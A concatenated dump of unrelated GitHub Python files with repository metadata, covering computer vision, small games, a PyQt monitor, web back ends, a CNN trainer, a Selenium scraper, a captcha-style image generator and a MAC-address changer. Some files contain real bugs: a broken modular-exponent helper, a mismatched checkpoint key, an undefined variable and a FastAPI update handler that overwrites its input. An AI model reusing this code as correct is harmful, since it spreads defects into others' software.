range(i - 1, -1, -1):\r\n if distance(mass_centers[i], mass_centers[j]) < 100:\r\n add = False\r\n if add:\r\n indexes.append(i)\r\n\r\n return [squares[i] for i in indexes]\r\n\r\n def find_pips(self, crop_img):\r\n crop_img = cv.GaussianBlur(crop_img, (5, 5), 0)\r\n\r\n params = cv.SimpleBlobDetector_Params()\r\n\r\n params.minThreshold = 0\r\n params.maxThreshold = 255\r\n\r\n params.filterByArea = True\r\n params.minArea = 150\r\n params.maxArea = 35000\r\n\r\n params.filterByCircularity = True\r\n params.minCircularity = 0.4\r\n\r\n params.filterByInertia = True\r\n params.minInertiaRatio = 0.6\r\n\r\n params.filterByConvexity = True\r\n params.minConvexity = 0.3\r\n\r\n detector = cv.SimpleBlobDetector_create(params)\r\n keypoints = detector.detect(crop_img)\r\n\r\n '''im_with_keypoints = cv.drawKeypoints(crop_img, keypoints, np.array([]), (0, 0, 255), cv.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\r\n\r\n plt.figure(figsize=(6, 6))\r\n plt.imshow(im_with_keypoints)\r\n plt.show()'''\r\n\r\n return keypoints\r\n","repo_name":"tomek-jankowiak/Dice_Detector","sub_path":"Picture.py","file_name":"Picture.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39374655374","text":"from run_game import game_choose_word, play_game, player_choose_word\nfrom os import system\n\ndef menu():\n print(\"\"\" MENU\n 1. Single Player\n 2. Multi Player\n x. Exit\\n\\n\"\"\")\n return input(\"Select an option: \")\n\ndef single_player():\n print(\"You're playing by yourself\")\n word = game_choose_word()\n winner = play_game(word)\n if winner == 0:\n print(\"You lost :(\\nThe word was\", word)\n else:\n print(\"You won!!!\")\n\ndef multi_player():\n print(\"You're playing with a friend\")\n word = player_choose_word()\n system(\"cls\")\n winner = play_game(word)\n if winner == 0:\n print(\"The chooser won!!\")\n else:\n print(\"The guesser won!!\")\n\ndef invalid():\n print(\"You have entered an invalid key.\\nPlease select an option from the menu\")","repo_name":"zangdi/hangman","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27963957996","text":"def modpow(a, b, m):\n p = a, res = 1\n for i in range(30):\n if b & (1 << i) != 0:\n res *= p\n res %= p\n p *= p\n p %= m\n return res\n\n# a / b を返す関数\ndef division(a, b, m):\n return (a * modpow(b, m - 2, m)) % m","repo_name":"tonko2/AtCoder","sub_path":"Libraries/division.py","file_name":"division.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1391196497","text":"'''\nCreated on Dec 19, 2014\n\n@author: ericrudisill\n'''\nfrom ui.MainWindow import Ui_MainWindow\nfrom PyQt4 import QtCore, QtGui\nfrom MacListWidget import MacListWidget\nfrom BsClient import BsClient\nfrom Device import Device\nfrom PlotWindow import PlotWindow\n\nclass MainWindow(QtGui.QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n \n # Docking layout preferences\n self.setCorner( QtCore.Qt.TopLeftCorner , QtCore.Qt.LeftDockWidgetArea );\n self.setCorner( QtCore.Qt.TopRightCorner, QtCore.Qt.RightDockWidgetArea );\n self.setCorner( QtCore.Qt.BottomLeftCorner, QtCore.Qt.LeftDockWidgetArea );\n self.setCorner( QtCore.Qt.BottomRightCorner, QtCore.Qt.RightDockWidgetArea );\n \n # Sexxy\n # http://stackoverflow.com/questions/14330642/how-do-i-achieve-consistent-highlighting-of-qlistwidget-items-across-widget-stat\n self.setStyleSheet('''\n QListWidget:item:selected:active { background: lightblue }\n ''')\n \n # Mdi\n self.mdiArea.subWindowActivated.connect(self.subWindowActivated)\n self.mdiChildNumber = 0\n \n # Device List\n #self.listWidget.itemActivated.connect(self.deviceActivated)\n #self.listWidget.itemSelectionChanged.connect(self.deviceSelected)\n self.checkSelectAll.stateChanged.connect(self.checkSelectAllStateChanged)\n \n # Menu hookups\n self.actionRSSI_Histogram.triggered.connect(self.createRSSIHistogram)\n \n # Internal structures\n self.devices = []\n \n # Attach to the server\n self.clientThread = BsClient(BsClient.HOST, BsClient.PORT)\n self.clientThread.received.connect(self.updateMacList)\n self.clientThread.start()\n \n def updateMacList(self, record):\n try:\n device = next(d for d in self.devices if d.mac == record.mac)\n except Exception:\n # no record found, so create one as well as a widget\n device = Device()\n device.mac = record.mac\n self.devices.append(device)\n w = MacListWidget(device)\n w.activeStateChanged.connect(self.deviceActiveStateChanged)\n wi = QtGui.QListWidgetItem(self.listWidget)\n wi.setSizeHint(w.sizeHint())\n self.listWidget.addItem(wi)\n self.listWidget.setItemWidget(wi, w)\n \n device.rssi = record.rssi_dec\n device.batt = record.batt\n device.count = device.count + 1\n device.update()\n \n def getActiveDevices(self):\n i = 0\n devices = []\n while i < self.listWidget.count():\n item = self.listWidget.item(i)\n w = self.listWidget.itemWidget(item)\n if w.isActive():\n devices.append(w.device)\n i = i + 1\n return devices\n \n def subWindowActivated(self, window): \n try:\n i = 0\n while i < self.listWidget.count():\n item = self.listWidget.item(i)\n w = self.listWidget.itemWidget(item)\n if w.device in window.widget().devices:\n w.setActiveState(QtCore.Qt.Checked, cancelEmit=True)\n else:\n w.setActiveState(QtCore.Qt.Unchecked, cancelEmit=True)\n i = i + 1\n \n except Exception:\n # sometimes window is nothing...why?\n pass\n \n def checkSelectAllStateChanged(self, newState):\n i = 0\n while i < self.listWidget.count():\n item = self.listWidget.item(i)\n w = self.listWidget.itemWidget(item)\n w.setActiveState(newState)\n i = i + 1\n \n def deviceActiveStateChanged(self, newState, device):\n w = self.mdiArea.activeSubWindow()\n if not w is None:\n if newState == QtCore.Qt.Unchecked:\n w.widget().removeDevice(device)\n else:\n w.widget().addDevice(device)\n \n \n def createRSSIHistogram(self):\n d = self.getActiveDevices()\n child = PlotWindow(devices=d)\n sub = self.mdiArea.addSubWindow(child)\n sub.setWindowTitle(\"RSSI Histogram \" + str(self.mdiChildNumber))\n self.mdiChildNumber = self.mdiChildNumber + 1\n child.showMaximized()\n \n# def deviceActivated(self, item):\n# print \"Activated \" + str(item)\n# print \"Widget: \" + self.listWidget.itemWidget(item).device.mac\n# \n# def deviceSelected(self):\n# item = self.listWidget.currentItem()\n# print \"Selected \" + str(item)\n# print \"Widget: \" + self.listWidget.itemWidget(item).device.mac \n ","repo_name":"erudisill/bitstorm-workbench","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22966107286","text":"import click\n\nfrom ens.console import echo\nfrom ens.merge import merge, edit\nfrom ens.remote import get_remote\nfrom ens.utils.click import arg_novel, opt_filter\n\n\n@click.group()\ndef utils():\n pass\n\n\n@utils.command('novel')\n@arg_novel\ndef func(novel):\n \"\"\"\n 测试 novel 的解析结果\n \"\"\"\n echo(novel)\n\n\n@utils.command('filter')\n@opt_filter\ndef func(filter):\n \"\"\"\n 测试 filter 的解析结果\n \"\"\"\n echo(filter)\n\n\n@utils.command('merge')\n@click.argument('text1')\n@click.argument('text2')\ndef func(text1, text2):\n \"\"\"\n 测试 merge\n \"\"\"\n echo(merge(text1, text2))\n\n\n@utils.command('edit')\n@click.argument('text')\ndef func(text):\n \"\"\"\n 测试 edit\n \"\"\"\n echo(edit(text))\n\n\n@utils.command('catalog')\n@arg_novel\ndef func(novel):\n remote = get_remote(novel.remote)\n cat = remote.get_catalog(novel.nid)\n print(cat.dump())\n\n\n@utils.command('chapter')\n@arg_novel\n@click.argument('cid')\ndef func(novel, cid):\n remote = get_remote(novel.remote)\n text = remote.get_content(novel.nid, cid)\n print(text)\n","repo_name":"syrinka/Elegant-Novel-Spider","sub_path":"ens/commands/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17294680847","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('list', views.listTask),\n path('add', views.addTask),\n path('editForm/', views.editForm),\n path('/', views.task, name=\"task\"),\n path('deleteTask/', views.delete)\n]","repo_name":"Gveideon/django_web_project","sub_path":"project_task/taskApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73736534532","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torchvision.datasets import MNIST\r\nfrom torchvision.transforms import ToTensor\r\nfrom torch.utils.data import DataLoader\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport os\r\n\r\nclass CNN(nn.Module): # CNN 클래스 정의 및 nn.Module 클래스를 상속\r\n def __init__(self):\r\n super(CNN, self).__init__() # nn.Module 클래스에 있는 __init__() 메소드를 실행.\r\n self.input_layer = nn.Conv2d(in_channels=1, out_channels=16, kernel_size=3, padding=1) # 16x28x28\r\n self.layer_1 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1, stride=2) # 32x14x14\r\n self.layer_2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1, stride=2) # 64x7x7\r\n self.layer_3 = nn.AdaptiveAvgPool2d((1, 1)) # 64x1x1\r\n self.layer_4 = nn.Linear(in_features=64, out_features=10) # 10\r\n\r\n def forward(self, x):\r\n x1 = F.relu(self.input_layer(x)) # 16x28x28\r\n x2 = F.relu(self.layer_1(x1)) # 32x14x14\r\n x3 = F.relu(self.layer_2(x2)) # 64x7x7\r\n x4 = self.layer_3(x3) # Bx64x1x1\r\n x5 = x4.view(x4.shape[0], 64) # x4.shape : Bx64x1x1 >> Bx64 *squeeze 1x64x1x1 >> 64\r\n output = self.layer_4(x5) # Bx10\r\n return output\r\n\r\nif __name__ == '__main__': # 이 파일을 직접 실행할때만 True값 리턴\r\n dataset = MNIST(root='./datasets', train=True, transform=ToTensor(), download=True) # MNIST 데이터셋 다운로드\r\n data_loader = DataLoader(dataset, batch_size=32, shuffle=True) #pytorch DataLoader 모듈 이용하여 데이터셋을 for 구문에서 돌림.\r\n\r\n model = CNN() #모델 정의\r\n\r\n\r\n criterion = nn.CrossEntropyLoss() #Loss 설정 (크로스엔트로피)\r\n\r\n optim = torch.optim.Adam(model.parameters(), lr=0.001) # weight_new = weight_old - weight_gradient * lr\r\n\r\n if os.path.isfile(\"./weight_dict.pt\"): # weight_dict.pt 파일이 있으면 True 리턴\r\n model_dict = torch.load('./weight_dict.pt')['mdoel_weight'] # 학습 weight 불러오기 ( model )\r\n model.load_state_dict(model_dict) # 모델 weight 갱신\r\n adam_dict = torch.load('./weight_dict.pt')['adam_weight'] # 학습 weight 불러오기 ( optimizer )\r\n optim.load_state_dict(adam_dict) # adam optimizer weight 갱신\r\n\r\n list_loss = [] # Loss값을 받을 리스트 선언\r\n list_acc = [] # accuracy값을 받을 리스트 선언\r\n for epoch in range(1): # 학습 epoch값 설정\r\n for input, label in tqdm(data_loader): # 데이터 불러오기 (batchsize = 32)\r\n # label 32\r\n output = model(input) # 32x10\r\n loss = criterion(output, label) # 1\r\n\r\n optim.zero_grad() #optimizer를 이용하여 weight들의 gradient 초기화\r\n loss.backward() # loss값에 따른 gradient 전달\r\n optim.step() #optimizer를 통한 weight 갱신\r\n list_loss.append(loss.detach().item()) #loss값 저장\r\n\r\n n_correct_answers = torch.sum(torch.eq(torch.argmax(output, dim=1), label)).item() # output과 label 맞는 개수 확인\r\n print(\"Accuracy: \", n_correct_answers / 32.0 * 100) # accuracy값 print\r\n list_acc.append(n_correct_answers / 32.0 * 100) # accuracy값 저장\r\n\r\n\r\n\r\n weight_dict = {'model_weight': model.state_dict(), 'adam_weight': optim.state_dict()} # 저장시��� 가중치 정의\r\n torch.save(weight_dict, \"./weight_dict.pt\") #훈련된 weight 저장\r\n\r\n\r\n plt.plot(list_loss) #plot할 데이터 (loss)\r\n plt.plot(list_acc) # plot할 데이터 (accuracy)\r\n\r\n plt.xlabel(\"Iteration\") # x축 정의\r\n plt.ylabel(\"Loss\") # y축 정의\r\n plt.show() # 결과 plot하기\r\n","repo_name":"Seungheon-Shin/DeepLearning_Bootcamp_with_pytorch","sub_path":"CNN/CNN_train.py","file_name":"CNN_train.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11514164143","text":"from fastapi import Depends, status, HTTPException\nfrom sqlalchemy.orm import Session\nfrom .. import schemas, models, db\n\ndef getBlogs(db: Session = Depends(db.get_db)):\n blogs = db.query(models.Blog).all()\n return blogs\n\n\ndef getBlog(id: int, db: Session = Depends(db.get_db)):\n blog = db.query(models.Blog).filter(models.Blog.id == id).first()\n if not blog:\n raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,\n detail = f'Blog with the id of {id} is not available'\n )\n return blog\n\n\ndef addBlog(blog: schemas.Blog, db: Session = Depends(db.get_db)):\n newBlog = models.Blog(title = blog.title, body = blog.body, user_id = 1)\n db.add(newBlog)\n db.commit()\n db.refresh(newBlog)\n return newBlog\n\n\ndef putBlog(id: int, blog: schemas.Blog, db: Session = Depends(db.get_db)):\n blog = db.query(models.Blog).filter(models.Blog.id == id)\n if not blog.first():\n raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,\n detail = f'Blog with the id of {id} is not available'\n )\n blog.update({'title' : blog.title, 'body' : blog.body})\n db.commit()\n return {'detail' : f'Blog with the id of {id} is updated'}\n\n\ndef deleteBlog(id: int, db: Session = Depends(db.get_db)):\n blog = db.query(models.Blog).filter(models.Blog.id == id)\n if not blog.first():\n raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,\n detail = f'Blog with the id of {id} is not available'\n )\n blog.delete(synchronize_session = False)\n db.commit()\n return {'detail' : f'Blog with the id of {id} is deleted'}","repo_name":"Yoo-Joo/FastAPI-Blog","sub_path":"blog/repository/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5831278043","text":"'''\n\n给你一个有 n 个节点的 有向无环图(DAG),请你找出所有从节点 0 到节点 n-1 的路径并输出(不要求按特定顺序)\n\n二维数组的第 i 个数组中的单元都表示有向图中 i 号节点所能到达的下一些节点,空就是没有下一个结点了。\n\n译者注:有向图是有方向的,即规定了 a→b 你就不能从 b→a 。\n\n\n示例 1:\n\n输入:graph = [[1,2],[3],[3],[]]\n输出:[[0,1,3],[0,2,3]]\n解释:有两条路径 0 -> 1 -> 3 和 0 -> 2 -> 3\n\n示例 2:\n\n输入:graph = [[4,3,1],[3,2,4],[3],[4],[]]\n输出:[[0,4],[0,3,4],[0,1,3,4],[0,1,2,3,4],[0,1,4]]\n\n示例 3:\n\n输入:graph = [[1],[]]\n输出:[[0,1]]\n\n示例 4:\n\n输入:graph = [[1,2,3],[2],[3],[]]\n输出:[[0,1,2,3],[0,2,3],[0,3]]\n\n示例 5:\n\n输入:graph = [[1,3],[2],[3],[]]\n输出:[[0,1,2,3],[0,3]]\n\n提示:\n\nn == graph.length\n2 <= n <= 15\n0 <= graph[i][j] < n\ngraph[i][j] != i(即,不存在自环)\ngraph[i] 中的所有元素 互不相同\n保证输入为 有向无环图(DAG)\n'''\nfrom queue import Queue\nfrom typing import List\n\nfrom leetcode.tools.time import printTime\n\n\nclass Solution:\n @printTime()\n def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:\n n = len(graph)\n ret = []\n q = Queue()\n q.put([0])\n while not q.empty():\n route = q.get()\n cur = route[-1]\n if cur == n - 1:\n ret.append(route)\n continue\n for g in graph[cur]:\n if g not in route:\n t = route.copy()\n t.append(g)\n q.put(t)\n return ret\n\ngraph = [[1,2,3],[2],[3],[]]\nSolution().allPathsSourceTarget(graph)","repo_name":"CrzRabbit/Python","sub_path":"leetcode/0797_M_所有可能的路径.py","file_name":"0797_M_所有可能的路径.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31689045694","text":"\nimport selenium.webdriver as wd\nimport time\nfrom selenium.webdriver.common.keys import Keys\n\nchrome_options = wd.ChromeOptions()\nchrome_options.add_argument(\"--incognito\")\nchrome_options.add_argument(\"--start-maximized\")\n\nbrowser = wd.Chrome(chrome_options = chrome_options)\n\nbrowser.get('https://www.longpaddock.qld.gov.au/silo/')\n\nchoice = input('point-data?')\n\nif int(choice) == 1:\n browser.get('https://www.longpaddock.qld.gov.au/silo/point-data/')\n\nsearch_bars = browser.find_elements_by_xpath('//*[@placeholder = \"dd/mm/yyyy\"]')\n\nsearch_bars\n\nstart_date = input('Start date in dd/mm/yyyy format: ')\n\n# entering in the start date field\nsearch_bars[0].send_keys(start_date)\n\nend_date = input('End date in dd/mm/yyyy format: ')\n\n# entering in the end date field\nsearch_bars[1].clear()\nsearch_bars[1].send_keys(Keys.CONTROL + \"a\")\nsearch_bars[1].send_keys(Keys.DELETE)\nsearch_bars[1].send_keys(end_date)\n\nradios = browser.find_elements_by_class_name('radio')\n\nradios[5].click()\n\nsearch_bars = browser.find_elements_by_xpath('//*[@placeholder = \"export_120416\"]')\n\nsearch_bars[0].send_keys('export1')\n\nsearch_bars[0].send_keys(Keys.ENTER)\n\n\nsearch_bars = browser.find_elements_by_xpath('//*[@placeholder = \"Search on station name, station number or decimal latitude/longitude e.g. -27.63,152.71\"]')\n\n\nsearch_bars[0].send_keys('4001')\n\nsearch_bars[0].send_keys(Keys.ENTER)\n\n\na = browser.find_elements_by_id('statioSelectSubmit')\n\na[0].click()\n\n\ntime.sleep(3)\n\nbrowser.quit()\n\n\n\n\n\n","repo_name":"KudoS1410/AustraliaRain","sub_path":"webout.py","file_name":"webout.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39742238494","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PIL import Image, ImageFilter, ImageDraw, ImageFont\nimport random\n\nim = Image.open('lena.jpg')\nprint(im.size)\nw, h = im.size\nim.thumbnail((w // 2, h // 2))\nim.save('lena_thumb.jpg', 'jpeg')\n\nim2 = im.filter(ImageFilter.BLUR)\nim2.save('lena_blur.jpg', 'jpeg')\n\n\ndef rand_bg():\n return random.randint(64, 255), random.randint(64, 255), random.randint(64, 255)\n\n\ndef rand_fg():\n return random.randint(32, 127), random.randint(32, 127), random.randint(32, 127)\n\n\nwidth = 260\nheight = 80\nimage = Image.new('RGB', (width, height), (255, 255, 255))\nfont = ImageFont.truetype('arial.ttf', 36)\ndraw = ImageDraw.Draw(image)\nfor x in range(width):\n for y in range(height):\n draw.point((x, y), fill=rand_bg())\nfor t in range(4):\n draw.text((60 * t + 10, 10), chr(random.randint(ord('a'), ord('z'))), font=font, fill=rand_fg())\nimage.save('rand.jpg', 'jpeg')\n","repo_name":"ArisQ/learn-python","sub_path":"46_pillow/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"29106799119","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport optparse\nimport re\n\n\ndef get_arguments():\n parser = optparse.OptionParser()\n parser.add_option(\"-i\", \"--interface\", dest=\"interface\", help=\"Interface to change its MAC address\")\n parser.add_option(\"-m\", \"--mac\", dest=\"new_mac\", help=\"New MAC address\")\n options, arguments = parser.parse_args()\n if not options.interface:\n parser.error(\"[-] Please specify an interface, use --help for more info.\")\n if not options.new_mac:\n parser.error(\"[-] Please specify a new mac, use --help for more info.\")\n return options\n\ndef change_mac(i, new_mac):\n mac_address = re.search(r\"([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}\", new_mac)\n \n if(mac_address):\n subprocess.call([\"ifconfig\", i, \"down\"])\n subprocess.call([\"ifconfig\", i, 'hw', 'ether', new_mac])\n subprocess.call([\"ifconfig\", i, \"up\"])\n else: \n print(\"[-] Could not change MAC address. Make sure to type the correct format\")\n \n\ndef get_current_mac(interface):\n ifconfig_result = subprocess.check_output(['ifconfig', interface])\n mac_address_search_result = re.search(r\"([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}\", ifconfig_result)\n \n if(mac_address_search_result):\n return mac_address_search_result.group(0)\n else: \n print(\"[-] Could not read MAC address.\")\n\n# Input collector\noptions = get_arguments()\n\n# Get Existing Mac\ncurrent_mac = get_current_mac(options.interface)\nprint(\"current Mac = \" + str(current_mac))\n\n# Update New Mac\nchange_mac(options.interface, options.new_mac)\ncurrent_mac = get_current_mac(options.interface)\nif current_mac==options.new_mac:\n print(\"[+] MAC address was successfully changed to ==> \" + current_mac)\nelse:\n print(\"[-] MAC address did not get changed\")\n\n\n","repo_name":"Sommysab/MAC-CHANGER","sub_path":"mac_changer.py","file_name":"mac_changer.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15396232266","text":"produkty = {'pomidor': 10, 'jablko': 11, 'banan': 4}\nmagazyn = {'pomidor': 15, 'jablko': 20, 'banan': 40}\n\ndo_zaplaty = 0\n# wypisanie dostepnych produktow dla uzytkwoniak\nwhile True:\n print(\"-\" * 40)\n print('Nasza zielnik oferuje: ')\n for produkt in produkty:\n print(f' - {produkt} - {produkty[produkt]} PLN')\n\n komenda = input(\"Co chcesz zrobic: [k]upic, [d]odać, [koniec] by przerwac zakupy: \")\n if komenda == 'koniec':\n break\n produkt_wybrany = input('co chesz kupic?: ')\n\n if produkt_wybrany not in produkty:\n print(\"Nie mamy takiego produktu!\")\n continue\n\n waga = float(input(f'ile chcesz kupic [{produkt_wybrany}]: '))\n if magazyn[produkty_wybrany] < waga:\n print(f'Mamy za mało {produkt_wybrany}, pozostalo {magazyn[produkt_wybrany]} kg')\n continue\n magazyn[produkt_wybrany] = magazyn[produkt_wybrany] - waga\n cena = produkty[produkt_wybrany]\n koszt = waga * cena\n do_zaplaty += koszt\n\n\nprint(\"-\" * 40)\nprint(f'za zakupy zaplacisz: {do_zaplaty}')","repo_name":"ArturoWest/pythonbootcamp","sub_path":"zjazd_2/zadanie_8_rozbudowa.py","file_name":"zadanie_8_rozbudowa.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18039025365","text":"'''\nCreated on 2 mars 2015\n\n@author: mathieu.rosser\n'''\n\n# http://stackoverflow.com/questions/20259025/module-object-has-no-attribute-drawmatches-opencv-python\n\nimport cv2\nfrom find_obj import filter_matches,explore_match\n\ndef manage_frame(img1, img2):\n # Initiate SIFT detector\n orb = cv2.SIFT()\n \n # find the keypoints and descriptors with SIFT\n kp1, des1 = orb.detectAndCompute(img1,None)\n kp2, des2 = orb.detectAndCompute(img2,None)\n \n # create BFMatcher object\n bf = cv2.BFMatcher(cv2.NORM_HAMMING)#, crossCheck=True)\n \n matches = bf.knnMatch(des1, trainDescriptors = des2, k = 2)\n p1, p2, kp_pairs = filter_matches(kp1, kp2, matches)\n try:\n explore_match('find_obj', img1,img2,kp_pairs)#cv2 shows image\n except:\n pass\n\nimg1 = cv2.imread('NewTerrain.png',0) # queryImage\nimg2 = cv2.imread('selectivePanorama.jpg',0) # trainImage\n\ncap = cv2.VideoCapture(\"../video/balancier_motifComplexe.mp4\")\n\nwhile cap.isOpened():\n ret, frame = cap.read()\n \n if frame is None:\n break\n \n img1 = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n manage_frame(img2, img1)\n \n cv2.imshow('frame', img1)\n \n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n\n \ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"ChristopheBolinhas/Balancier","sub_path":"balancier/exemple1.py","file_name":"exemple1.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73473741894","text":"\"\"\"\nCalculate front length scale at wall.\nUsage:\n front_length.py ... [--output=]\n\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pathlib\nfrom docopt import docopt\nfrom dedalus.tools import logging\nfrom dedalus.tools import post\nfrom dedalus.tools.parallel import Sync\n\nplt.style.use('prl')\n\ndef calc_front(filename, start, count, output=None):\n\n filename = pathlib.Path(filename)\n stem = filename.stem.split(\"_\")[0]\n dpi = 150\n savename_func = lambda write: '{}_{:06}.png'.format(stem, write)\n # Layout\n\n fig = plt.figure(figsize=(10,5.5))\n axes = fig.add_axes([0.1, 0.1, 0.8, 0.8])\n cax = fig.add_axes([0.1,0.9,0.2,0.02])\n axes.set_xlabel(r'$k_x$')\n axes.set_ylabel(r'$z$')\n\n with h5py.File(filename,mode='r') as file:\n img = axes.imshow(np.zeros_like(file['tasks/Temperature(y=+1)'][0,:,:,0]))\n cbar = fig.colorbar(img, cax=cax,orientation='horizontal')\n\n for index in range(start, start+count):\n temp = file['tasks/Temperature(y=+1)'][index,:,:,0]\n c_temp = np.fft.rfft(temp,axis=1)\n power = (c_temp * c_temp.conj()).real\n log_power = np.log10(power)\n\n vmin = np.nanmin(log_power)\n vmax = np.nanmax(log_power)\n if vmin == -np.inf:\n vmin = vmax-16\n print(\"vmin, vmax = {},{}\".format(vmin,vmax))\n img.set_data(log_power)\n cbar.mappable.set_clim(vmin=vmin,vmax=vmax)\n cbar.set_ticks([vmin,vmax])\n cax.xaxis.tick_top()\n cax.xaxis.set_label_position('top')\n\n savename = savename_func(file['scales/write_number'][index])\n savepath = output.joinpath(savename)\n fig.savefig(str(savepath), dpi=dpi)\n plt.close(fig)\n\nargs = docopt(__doc__)\noutput_path = pathlib.Path(args['--output']).absolute()\n# Create output directory if needed\nwith Sync() as sync:\n if sync.comm.rank == 0:\n if not output_path.exists():\n output_path.mkdir()\npost.visit_writes(args[''], calc_front, output=output_path)\n \n","repo_name":"jsoishi/wall_modes_topology","sub_path":"python/front_length.py","file_name":"front_length.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40774625605","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-05-31 08:00:00\n# @Last Modified : 2020-05-31 08:00:00\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\"\"\"\n# 实现函数 ToLowerCase(),该函数接收一个字符串参数 str,并将该字符串中的大写字母转换成小写字母,之后返回新的字符串。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入: \"Hello\"\n# 输出: \"hello\" \n# \n# 示例 2: \n# \n# \n# 输入: \"here\"\n# 输出: \"here\" \n# \n# 示例 3: \n# \n# \n# 输入: \"LOVELY\"\n# 输出: \"lovely\"\n# \n# Related Topics 字符串\n\n\"\"\"\nimport string\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n\n def toLowerCase(self, str: str) -> str:\n delta = ord(\"a\") - ord(\"A\")\n ans = \"\"\n for char in str:\n if char in string.ascii_uppercase:\n ans += chr(ord(char) + delta)\n else:\n ans += char\n return ans\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n@pytest.mark.parametrize(\"args,expected\", [\n (\"Hello\", \"hello\"),\n (\"here\", \"here\"),\n (\"LOVELY\", \"lovely\"),\n])\ndef test_solutions(args, expected):\n assert Solution().toLowerCase(args) == expected\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", __file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0709_to-lower-case.py","file_name":"0709_to-lower-case.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26603250909","text":"import sys\nimport os\nimport shutil\n\n\"\"\"\nhelper utilit: move a more compact trained model to permanent storage\n\"\"\"\n\ndef main():\n src = sys.argv[1]\n dst = sys.argv[2]\n \n if src.endswith('/'):\n src = src[:-1]\n \n _, dirname = os.path.split(src)\n \n files = os.listdir(src)\n \n assert not os.path.isdir(os.path.join(dst, dirname))\n \n os.mkdir(os.path.join(dst, dirname))\n \n for file in files:\n can_copy = True\n try:\n epoch = int(file)\n can_copy = False\n except:\n pass\n \n if file.startswith('model') or file.startswith('checkpoint'):\n if 'boids' not in dirname:\n can_copy = False\n \n if file == '__pycache__':\n can_copy = False\n \n if not can_copy:\n continue\n \n if os.path.isdir(os.path.join(src, file)):\n shutil.copytree(os.path.join(src, file), os.path.join(dst, dirname, file))\n else:\n shutil.copyfile(os.path.join(src, file), os.path.join(dst, dirname, file))\n \nif __name__ == '__main__':\n main()","repo_name":"yyuting/learning_from_program_trace","sub_path":"mv_model_result.py","file_name":"mv_model_result.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"28191316797","text":"import folium as folium\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponsePermanentRedirect, HttpRequest\nimport typing as t\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import 